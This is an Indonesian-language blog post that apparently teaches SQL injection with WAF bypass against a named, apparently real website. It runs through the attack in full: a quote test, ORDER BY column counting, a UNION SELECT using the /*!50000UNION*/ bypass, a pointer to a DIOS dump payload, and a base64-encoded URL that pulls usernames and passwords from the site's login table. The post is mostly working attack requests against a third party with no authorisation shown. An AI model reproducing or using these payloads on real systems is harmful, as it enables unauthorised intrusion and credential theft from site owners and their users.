Easy waff sql injection

kakatoji
16 Apr, 2017
Win Free Bitcoins every hour! - www.freebitco.in
OK simak baik-baik


contoh target: http://dynamexcertification.org/services.php?sid=914


kita cek apakah web nya vuln injection atau tidak,kita mulai dengan menambah kan tanda (') di akhir angka
http://dynamexcertification.org/services.php?sid=914'


Ternyata blank page/ artikel ada yg hilang.
sekarang kita lanjut ORDER BY

http://dynamexcertification.org/services.php?sid=914+order+by+1--[normal]
http://dynamexcertification.org/services.php?sid=914+order+by+10--[normal]
kita lompat naik ke kolom 20 untuk memper singkat waktu
http://dynamexcertification.org/services.php?sid=914+order+by+20--[error/blank]
kita turunkan lagi ke angak 15 dan hasil nya masih normal
http://dynamexcertification.org/services.php?sid=914+order+by+15--[normal]
http://dynamexcertification.org/services.php?sid=914+order+by+16--[error/blank]
YESSSS dapat error nya atau blank nya di angka 16

sekarang kita lanjud ke union+select untuk mendapat kan angka ajaib nya
perlu di inggat saat melakukan union+select kita tambahkan simbol (-) di depan angka
contoh:
http://dynamexcertification.org/services.php?sid=-914+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Ternyata mengandung WAFF em ok gan jangn binggung dulu coba cek dulu dimari contoh" querry peluntur waff JUTSU ,dan sambil lihat waff nya jg sambil di praktekin.

kita coba tambahin di UNION nya apakah masih NOT ACCEPTABLE atau normal
http://dynamexcertification.org/services.php?sid=-914+/*!50000UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
dan hasil nya suksess,dan muncul angka nya :D

ok selanjud nya kita dump angka nya supaya keluar table-table yg ada di web nya,di sini kita gunakan DIOS supaya cepet


untuk dios nya ambil di SINI aja



setelah itu kita dump password dan username nya.

contoh query dump pass and user "aHR0cDovL2R5bmFtZXhjZXJ0aWZpY2F0aW9uLm9yZy9zZXJ2aWNlcy5waHA/c2lkPS05MTQrLyohNTAwMDBVTklPTiovK1NFTEVDVCsxLC8qITUwMDAwY29uY2F0Ki8oaWQsMHgzYzYyNzIzZSx1c2VybmFtZSwweDNjNjI3MjNlLHBhc3N3b3JkKSwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1K2Zyb20rbG9naW4tLQ== "




maaf sebelum nya bila tulisan ini gk bisa di fahami. thanks

LANJUD LAIN WAKTU GAN BY

kakatoji

kakatoji

ingin mulai belajar di bloger untuk mendapatkan income,untuk penghasilan tambahan dan mengaitkan hobi untuk menulis

Next Post Previous Post
No Comment
Add Comment
comment url